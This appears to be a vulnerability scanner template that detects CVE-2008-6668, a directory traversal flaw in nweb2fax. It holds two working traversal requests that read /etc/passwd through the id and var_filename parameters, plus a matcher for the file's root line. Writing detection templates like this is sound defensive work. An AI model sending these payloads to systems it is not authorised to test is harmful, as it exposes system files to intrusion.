id: CVE-2008-6668 info: name: nweb2fax <= 0.2.7 Directory Traversal author: geeknik severity: high description: Multiple directory traversal vulnerabilities in nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via .. in the id parameter to comm.php and var_filename parameter to viewrq.php. reference: - https://www.exploit-db.com/exploits/5856 - https://nvd.nist.gov/vuln/detail/CVE-2008-6668 classification: cve-id: CVE-2008-6668 tags: nweb2fax,lfi,cve,cve2008,traversal requests: - method: GET path: - "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd" - "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd" matchers-condition: and matchers: - type: status status: - 200 - type: regex part: body regex: - "root:.*:0:0:"